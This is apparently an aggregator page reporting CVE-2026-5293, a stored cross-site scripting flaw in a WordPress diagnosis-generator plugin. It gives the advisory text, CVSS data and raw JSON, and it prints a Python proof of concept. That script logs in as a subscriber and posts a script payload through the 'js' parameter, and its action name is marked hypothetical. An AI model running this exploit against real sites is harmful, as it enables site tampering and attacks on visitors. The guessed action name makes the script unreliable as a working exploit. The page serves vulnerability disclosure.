Security Vulnerability Report
中文
CVE-2026-5293 CVSS 6.4 MEDIUM

CVE-2026-5293

Published: 2026-05-20 02:16:37
Last Modified: 2026-05-20 13:54:55
Source: [email protected]

Description

The 診断ジェネレータ作成プラグイン (Diagnosis Generator) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'js' parameter in versions up to and including 1.4.16. This is due to missing authorization checks and insufficient input sanitization in the themeFunc() function. The function is hooked to 'admin_init' and processes theme update requests without verifying user capabilities, allowing any authenticated user (including subscribers) to save malicious JavaScript to theme files. Additionally, the save() function uses stripslashes() which removes WordPress's magic quotes protection. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in theme files that will execute whenever a user accesses a page containing the diagnosis form shortcode.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Diagnosis Generator <= 1.4.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: WordPress Diagnosis Generator <= 1.4.16 Stored XSS # Date: 2026-05-20 # Vulnerable Endpoint: Typically wp-admin/admin.php or hooked via admin_init target_url = "http://example.com/wp-admin/admin.php" login_url = "http://example.com/wp-login.php" # Attacker credentials (Subscriber level) username = "attacker" password = "password" # Malicious payload to be saved in theme files payload = "<script>alert('XSS - CVE-2026-5293');</script>" session = requests.Session() # 1. Authenticate as a low-privilege user login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": target_url } session.post(login_url, data=login_data) # 2. Send malicious request to trigger themeFunc() # The specific parameter 'js' is vulnerable as per description exploit_data = { "action": "update_theme", # Hypothetical action triggering the hook "js": payload } response = session.post(target_url, data=exploit_data) if response.status_code == 200: print("[+] Payload sent successfully. Check pages with the diagnosis form shortcode.") else: print("[-] Request failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5293", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:37.053", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The 診断ジェネレータ作成プラグイン (Diagnosis Generator) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'js' parameter in versions up to and including 1.4.16. This is due to missing authorization checks and insufficient input sanitization in the themeFunc() function. The function is hooked to 'admin_init' and processes theme update requests without verifying user capabilities, allowing any authenticated user (including subscribers) to save malicious JavaScript to theme files. Additionally, the save() function uses stripslashes() which removes WordPress's magic quotes protection. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in theme files that will execute whenever a user accesses a page containing the diagnosis form shortcode."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L26", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L39", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/diagnosisAdminClass.php#L409", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/include_files/user-viewFormPage.php#L102", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L26", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L39", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/diagnosisAdminClass.php#L409", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/include_files/user-viewFormPage.php#L102", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c5293c0f-90b0-41df-a623-90297d998c41?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.